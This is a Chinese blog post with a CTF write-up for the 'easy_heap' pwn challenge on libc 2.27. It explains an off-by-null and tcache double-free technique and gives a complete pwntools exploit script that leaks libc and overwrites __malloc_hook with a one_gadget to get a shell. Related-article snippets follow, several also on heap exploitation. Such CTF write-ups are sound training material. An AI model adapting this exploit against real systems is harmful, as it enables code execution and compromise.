easy_heap

最新推荐文章于 2024-05-28 13:54:20 发布
最新推荐文章于 2024-05-28 13:54:20 发布
阅读量332 收藏
点赞数

easy_heap 

题目保护全开,在malloc的时候存在null-by-one漏洞,由于分配的堆块的大小都是0x100(加堆头),所以null-by-one漏洞只会覆盖下个堆块的prev_inuse标志位为0。一般的利用思路是通过伪造prev_size的大小来构造overlap-chunk为所欲为,但是这种思路在这道题目里行不通,因为malloc在读取内容的时候‘\0’会截断而且堆块大小是0x100。 由于题目给的库是libc2.27,引入了tcache机制,tcache在分配完其中的7个堆块后如果再次分配,它会先从unsortedbin中把和要分配的堆块大小相同的堆块全部以单链表形式链入tcache的链表里然后再分配出来,如果unsortedbin中有三个及以上符合大小的堆块,当并入tcache时,你会发现中间的堆块其fd->bk以及bk->fd仍然指向它自身,利用点就是在这里,题目中恰好设置了堆块为0x100对齐,所以分配出来的堆块内容如果什么都不输那么它的“\0”终止符不会影响fd指针,在将中间的堆块重新malloc出来利用nullbyone漏洞修改下个堆块的previnuse位为0,然后填满tcache后free掉下个堆块,那么他就会和前面的堆块合并形成overlap-chunk,接下来泄漏libc地址,修改malloc_hook为one_gadget就能getshell了。 思路来自hitcon划水时的发现~

/**************************another one*****************************/

libc2.27->tcache
只能malloc(0xF8)
可以先填满对应的tcache bin获得unsorted bin
审错了他的read过程,看成了

      if ( a2 - 1 < (unsigned int)v3 || !a1[v3] || a1[v3] == '\n' )

        ++v3;

        break;

以为会连续生成两个"\x00",没法bypass,(fd和bk只有末位是"\x00"),卡了好久
晚上回来重新看发现看错了orz
剩下就是利用off by one覆盖prev in use,使两个堆块发生合并,然后便可以有两个索引指向同一个chunk
而后进行tcache的double free,使chunk分配到malloc hook,写入one_gadget,再malloc一次即可getshell

from pwn import *
import sys
def new(size,note):
  p.recvuntil("?\n> ")
  p.sendline("1")
  p.recvuntil("size \n> ")
  p.sendline(str(size))
  p.recvuntil("content \n> ")
  if size==0:
    return
  else:
     p.send(note)
def delete(index):
  p.recvuntil("> ")
  p.sendline("2")
  p.recvuntil("index \n> ")
  p.sendline(str(index))
context.log_level='debug'
#p=remote("118.25.150.134",6666)
p=process("./easy_heap")
for i in range(10):
   new(0,"kirin\n")
#make unsorted bin
for i in range(5):
  delete(9-i)#9 8 7 6 5
delete(3)
delete(1)
delete(2)
delete(0)
delete(4)
for i in range(7):
    new(0,"kirin\n")
new(0,"kirin\n")
new(0xf8,"\x00")
new(0,"kirin\n")
for i in range(6):
  delete(i+1)
delete(9)
delete(0)
#leak
p.recvuntil("?\n> ")
p.sendline("3")
p.recvuntil("index \n> ")
p.sendline("8")
s=p.recv(6)
libc_addr=u64(s.ljust(8,"\x00"))-0x3ebca0
print "libc_addr="+hex(libc_addr)
for i in range(8):
  new(0,"kirin\n")
delete(8)
delete(9)
new(0x10,p64(libc_addr+0x3ebc30))
new(0x10,"kirin\n")
for i in range(8):
   delete(i)
for i in range(8):
   new(0x10,p64(libc_addr+0x10a38c))
delete(0)
p.recvuntil("> ")
p.sendline("1")
p.interactive()

 

大帅锅1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2699
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
BUU刷题 easy_heap
清霂的博客
05-13 180
目录easyheapmagicheapciscn_2019_n_3 easyheap #!/usr/bin/env python2 # coding=utf-8 from pwn import * arch = "amd64" filename = "easyheap" context(os="linux", arch=arch, log_level="debug") content = 1 offset = 0 # elf elf = ELF(filename) fake_heap_addr=0x6
easyheap
zyh18851473527的博客
04-09 677
首先,检查一下程序的保护机制,发现没开PIE,且got表可写 然后,我们用IDA分析一下,发现没有show功能 出现了很多sub_4008F1()函数我们一个个点开看一下,发现最后一个是创建,为了便于分析我们可以改成add(n) 可以看出创建节点功能里,存在ptr[i]堆内容未初始化的漏洞经过分析,节点的结构体如下 struct Obj{ char *Data; int Size...
CISCN --EzHeap
最新发布
A13837377363的博客
05-28 287
思路清晰了,将下一个0x420大小的chunk给free掉,这样fd段就是usbin地址,然后用edit将当前chunk和下一个chunk的size段和pre_size填满,然后show(),就能全都打印出来,就能泄露libc基址了。所以,整体就是:泄露libc基址--->计算出environ地址-->泄露堆地址--->覆盖fd-->分配到environ-0x200的位置-->泄露栈地址-->覆盖fd-->分配到栈上-->写入rop链。使用的方法是environ泄露栈地址,然后在栈上构造orw的rop链。
LCTF 2018 easy_heap
yms0211的博客
09-18 190
LCTF 2018 easy_heap
[ZJCTF 2019]EasyHeap
、moddemod
07-03 736
下面的地址主要是因为这题没开PIE,地址是不会变化的… 下图是构造的chunk写magic变量 exp from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def create(size, content): p.sendlineafter('choice :', str(1)) p.sendlineafter('Heap..
LCTF_2018_Platform:LCTF 2018平台
05-04
LCTF 2018 platformLCTF 2018 比赛平台。本项目中前端代码为webpack打包后的前端代码,前端源码参见。部署项目使用nginx+uwsgi+django部署,示例的和都已上传。...然后把web目录owner修改为uwsgi的启动用户:chown -R ...
elk-easy-setup:易于设置ELK Suite。 (Elasticsearch Logtash Kibana)
02-01
根据自身环境配置,修改vars目录下, vars jvm_heap_size名称配置文件的jvm_heap_size大小值至合适大小。 master角色节点修改master.yml文件, mix节点修改mix.yml文件......,文件中其他配置项按需也可以修改。...
BobBuilder_app
03-09
Because the data pages are separate from the Page List structure, implementing locking is easy and isolated within a page and not the whole index, not so for normal trees. Splitting a page when full ...
vld-2.5.1_2.zip
07-20
Visual Leak Detector is currently the only freely available memory leak detector for Visual C++ that provides all of the above professional-level features packaged neatly in an easy-to-use library. ...
EurekaLog_7.5.0.0_Enterprise
11-15
EurekaLog 7.5 (18-August-2016) 1)..Important: Installation layout was changed. All packages now have version suffix (e.g. EurekaLogCore240.bpl). No files are copied to \bin folder of IDE....
2020YCBCTF:2020羊城杯官方writeup及
03-24
2020年 2020羊城杯官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
buuctf easyheap
weixin_44932880的博客
02-09 516
主要知识 堆块的结构,fastbin任意地址构造堆块的检查机制, 对题目流程的认真分析 1.检查文件没有地址偏移的保护 2.查看功能。 3.通过堆的溢出生成一块假堆块 4.假堆块可覆盖heaparray[0]为free的got表的地址. 5.通过更改heaparray[0]存的堆块的内容,将free的got覆盖为system的地址。 6.调用free函数并在前面将参数填充为"/bin/sh\x0...
bytectf2020 easyheap
wuyvle的博客
02-07 3339
做一下高版本的堆题目,2.34的glibc符号实在是搞不了,glibc in all one里面下载都是不全的,先做一下2.31的堆吧 经典的菜单题,漏洞在new函数里 堆限制了大小不能超过0x80,并且会有在最后的位置置零,但是这里的size_1是我们自己设置的,也就是说我们可以在任意地方写0,我们先释放7个堆块,把0x90大小的堆块放进unsorted bins里面,然后再申请出来,堆块就会把main_aren带出来,我们打印出来就能得到libc基值,但是堆块会清空原来空闲的堆块,但是和calloc不一
(BUUCTF)ycb_2020_easy_heap (glibc2.31的off-by-null + orw)
xy1458214551的博客
01-14 886
BUUCTF的ycb_2020_easy_heap题解,包含了glibc2.31下的off by null和orw
[BUUCTF]PWN——[ZJCTF 2019]EasyHeap
mcmuyanga的博客
12-16 469
[ZJCTF 2019]EasyHeap 附件 步骤: 例行检查,64位程序 试运行一下看看程序大概执行的情况,经典的堆块的菜单 64位ida载入,首先检索字符串,发现了读出flag的函数 看一下每个选项的函数 add 这边size的大小由我们输入控制,heaparray数组在bss段上存放着我们chunk的指针 edit,简单的根据指针修改对应chunk里的值,但是这里的size也是由我们手动输入的,也就是说只要我们这边输入的size比add的时候输入的size大就会造成溢出 delete,释
LCTF2018 PWN easy_heap学习(以及tcache基础认识)
a2590035252的博客
09-24 427
适合于广大像我一样的pwn爱好者
C++语法——make_heap、push_heap、pop_heap、sort_heap使用介绍
06-13
make_heap、push_heap、pop_heap和sort_heap都是C++ STL库中的算法,用于操作堆(heap)数据结构。 1. make_heap:将一个无序的区间转换为堆。函数原型如下: ``` template void make_heap (RandomAccessIterator...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值